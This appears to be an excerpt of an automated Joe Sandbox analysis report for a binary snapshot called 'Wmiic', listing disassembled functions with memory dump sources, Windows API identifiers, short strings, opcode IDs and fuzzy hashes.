                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$ByteCharMultiProcessWide$AllocFree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1621643742-0
                                                                                                                                                                                                    • Opcode ID: c6716c944c1ee476e8fa47434dc82bb4148891a779e4bc662eaca591434aa38c
                                                                                                                                                                                                    • Instruction ID: 73261801b5f655ca270de00b92cee958fb11958522fdb0b445105a0a4ffb2315
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6716c944c1ee476e8fa47434dc82bb4148891a779e4bc662eaca591434aa38c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9216235605B8081E7219F67B81079AABE5FB4D7E4F044229EF99477E9DF38C4508600
                                                                                                                                                                                                    Function 0000000140016470 Relevance: 7.6, APIs: 6, Instructions: 55memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                    • Opcode ID: 75444d69a368e4496316f745fd35ff06dd85ac79cfc29b2ce87d2832b74a9499
                                                                                                                                                                                                    • Instruction ID: c44fe957979a91557bf25453a9036a81366d3cea9cc272b65acdfdfda9ee0274
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75444d69a368e4496316f745fd35ff06dd85ac79cfc29b2ce87d2832b74a9499
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19114CB5605A8482EB129B73A8043DA67A1FB8DBD0F444029FF4E47768DF3CC9498A40
                                                                                                                                                                                                    Function 00000001400049A5 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Item$HeapText$_snwprintf_s$AllocProcess$FreeLocal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 65965981-0
                                                                                                                                                                                                    • Opcode ID: 21198b540a65345ed7fdc7f0815551f0124c4edbe3ffc441835e824b3edb693a
                                                                                                                                                                                                    • Instruction ID: 8c88ce8c025d37f4d5b0e8d3153f6582234e056b6c9f906e17911e81f835f57e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21198b540a65345ed7fdc7f0815551f0124c4edbe3ffc441835e824b3edb693a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11EFB161968182E7619B12F1547EE6311F789BC4F801125FF4E17AA9CF7CC54A8740
                                                                                                                                                                                                    Function 000000014001F550 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$CallTranslator
                                                                                                                                                                                                    • String ID: MOC
                                                                                                                                                                                                    • API String ID: 3569367362-624257665
                                                                                                                                                                                                    • Opcode ID: 984ef666c86ff0f26ee1dd0a56a556fdf105fcc5e21237e672a10548b4838afa
                                                                                                                                                                                                    • Instruction ID: 1981bdcadb06ce4bdc8508a6749bf47e27913e4d16f9d5307a86893b0f960b5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 984ef666c86ff0f26ee1dd0a56a556fdf105fcc5e21237e672a10548b4838afa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7861C172204BC096EB21CB16E0807EDB3A1F788BC8F044612FB8E4BAA9DF79C155C700
                                                                                                                                                                                                    Function 0000000140002100 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49processCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CreateErrorLastTerminate
                                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                                    • API String ID: 391916801-2439710439
                                                                                                                                                                                                    • Opcode ID: f0eea5fc8340ddcc071df88f9cb943006310234530f1304aabdf6978d6f4de95
                                                                                                                                                                                                    • Instruction ID: d870a3890a1a428991c6d2e8576a3997bb0424cf396cd575bfeec439b2630230
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0eea5fc8340ddcc071df88f9cb943006310234530f1304aabdf6978d6f4de95
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89116072614AC086DB608B25F44539FB3E5FBC8794F544129A78D87B69EF7CC055CB00
                                                                                                                                                                                                    Function 000000014001ECA4 Relevance: 6.1, APIs: 4, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$BaseImage
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2482573191-0
                                                                                                                                                                                                    • Opcode ID: 2237048bf79284b0269ed9c29fe75178a274c15cdf13b4d9d56bc2e72612f190
                                                                                                                                                                                                    • Instruction ID: 43c81dbebb5e7642f9f0f2e393759842062bb8c55fdd15a841d76fd40ecc4635
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2237048bf79284b0269ed9c29fe75178a274c15cdf13b4d9d56bc2e72612f190
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B241877220158185EA26A727E4457EDA794BB8DFD8F558121FF194B7F2CF36C482C701
                                                                                                                                                                                                    Function 00000001400100E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 66memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                                                                                                    • String ID: get_service_username()$username
                                                                                                                                                                                                    • API String ID: 1617791916-1118073074
                                                                                                                                                                                                    • Opcode ID: c429dc061a9a6cf9038fc22e94fa89e910a21fbdcc0c89adca4798bb4a11ac5d
                                                                                                                                                                                                    • Instruction ID: 0cb368d2c87889caaf96027648e82f4ecc8631b9f2301991adb876be56352873
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c429dc061a9a6cf9038fc22e94fa89e910a21fbdcc0c89adca4798bb4a11ac5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C218E35311F9181EB52EB66A4007D963A0FB4DBD4F145115FFA9477AADF39C5918300
                                                                                                                                                                                                    Function 0000000140007CE0 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3907606552-0
                                                                                                                                                                                                    • Opcode ID: a1a1746b7a1b8be94718e7fd56a79bcc54c5f9d3e77d580c70b2e15733a3a24d
                                                                                                                                                                                                    • Instruction ID: 063db28a99952865a7c583c334f68a92e69e6d162e6800a70cf4d12b91e85143
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1a1746b7a1b8be94718e7fd56a79bcc54c5f9d3e77d580c70b2e15733a3a24d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1118FB1604B8086E761DF13B80079AB3B0FB99BC4F544129FF8943769DB3CD5458A44
                                                                                                                                                                                                    Function 0000000140020928 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecodePointer_errno_flush_freebuf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1889905870-0
                                                                                                                                                                                                    • Opcode ID: 658a91a57760e8bfdda30ba3aa02c586fb4cbff4a2ea938cc334cdc9ad90d10b
                                                                                                                                                                                                    • Instruction ID: dd73d03f2c1ea2f4e6da5caa570c6c82c2ded73eed670ef386c6a809164821d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 658a91a57760e8bfdda30ba3aa02c586fb4cbff4a2ea938cc334cdc9ad90d10b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0401D432B1474042FB17AB7794513ED62515BDD7E8F280328BB524B5F7CE39CC818240
                                                                                                                                                                                                    Function 0000000140002990 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Rect$DesktopMove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2894293738-0
                                                                                                                                                                                                    • Opcode ID: 6c793aff5eefccb5bb44ad8668e35a694a0f6c32e109282dd85a116bf074420f
                                                                                                                                                                                                    • Instruction ID: 9b88486dfa801f3ea56ee834c5fc61d219d0278a4a683ae30dfced5db79f75a2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c793aff5eefccb5bb44ad8668e35a694a0f6c32e109282dd85a116bf074420f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 940121723255418BEB65CF3AB4087597BA1F789BC5F485118BF4A93768DF3CD8048B04
                                                                                                                                                                                                    Function 000000014001FFE8 Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                                    • Opcode ID: e500c259cdb1fa6dcf6b2e184e15fca3845d434d9491e58f95f4bba58c537ff6
                                                                                                                                                                                                    • Instruction ID: 94aae76b054f4c278dc94295e20dd2d585d9ec13bd88ad299c4b3e6ab06a23ff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e500c259cdb1fa6dcf6b2e184e15fca3845d434d9491e58f95f4bba58c537ff6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09014F7261064485FB176B66C9913E926629B98BF5F548349FB2A0B3F2CB394815CA10
                                                                                                                                                                                                    Function 0000000140004CCC Relevance: 6.0, APIs: 4, Instructions: 33windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageSend$Item$EnvironmentTextVariable_snwprintf_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2263371560-0
                                                                                                                                                                                                    • Opcode ID: 1e261de19b2049f26f316e4d274318e75987586aff01661f23e1450ee786f346
                                                                                                                                                                                                    • Instruction ID: a487d99df9754013241ce58257599312179a340a947fd995e23cf4898c0dcb84
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e261de19b2049f26f316e4d274318e75987586aff01661f23e1450ee786f346
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF06DB471145042FB62D773F579BEA2251978DBC4F81102AAE0A0BFA5CD3D84C94700
                                                                                                                                                                                                    Function 0000000140004D7A Relevance: 6.0, APIs: 4, Instructions: 29windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageSend$Item$EnvironmentTextVariable_snwprintf_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2263371560-0
                                                                                                                                                                                                    • Opcode ID: 321d717a814a89acfc3efa5d88a05e77f0a26d3068045a377efcac5b98d509ea
                                                                                                                                                                                                    • Instruction ID: b8c1a0b79c580c7536ba96cf28a415a1f70d0243cf03293b484bff3c148e4e38
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 321d717a814a89acfc3efa5d88a05e77f0a26d3068045a377efcac5b98d509ea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F05E7871154042FB629773B979BDA225197CDBC4F811029AE4A0BFA5DD3C848A4700
                                                                                                                                                                                                    Function 000000014001FD14 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                    • API String ID: 3186804695-3733052814
                                                                                                                                                                                                    • Opcode ID: c278b547bf228ec2d41bf35c1773a0c57779f941625d245b0e0dc3692df98d56
                                                                                                                                                                                                    • Instruction ID: d9d2eefccdb791b5da5f69efa20d78588aa8d92e6e4a8d7ac5f61f1dcab05ab9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c278b547bf228ec2d41bf35c1773a0c57779f941625d245b0e0dc3692df98d56
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F518F3220428086EB669E27A4407FD76E1F749BD8F044125FB995BBFACB39C891DB01
                                                                                                                                                                                                    Function 0000000140006960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentVariable_snwprintf_s
                                                                                                                                                                                                    • String ID: %llu
                                                                                                                                                                                                    • API String ID: 709434441-507646796
                                                                                                                                                                                                    • Opcode ID: 62323e847072239d2dfe07a9b4d82c4042ae325b3561faaad9a455eb713a102c
                                                                                                                                                                                                    • Instruction ID: e467e5e73326f99c3117ac0c8c0fbe1bd46234100152dbfbcb59804b6ff9c8b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62323e847072239d2dfe07a9b4d82c4042ae325b3561faaad9a455eb713a102c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 581142F271568487EE55CF25F450399B3AAF78C7D0F40622ABB5A4BBA9DB38C445CB00
                                                                                                                                                                                                    Function 0000000140008160 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
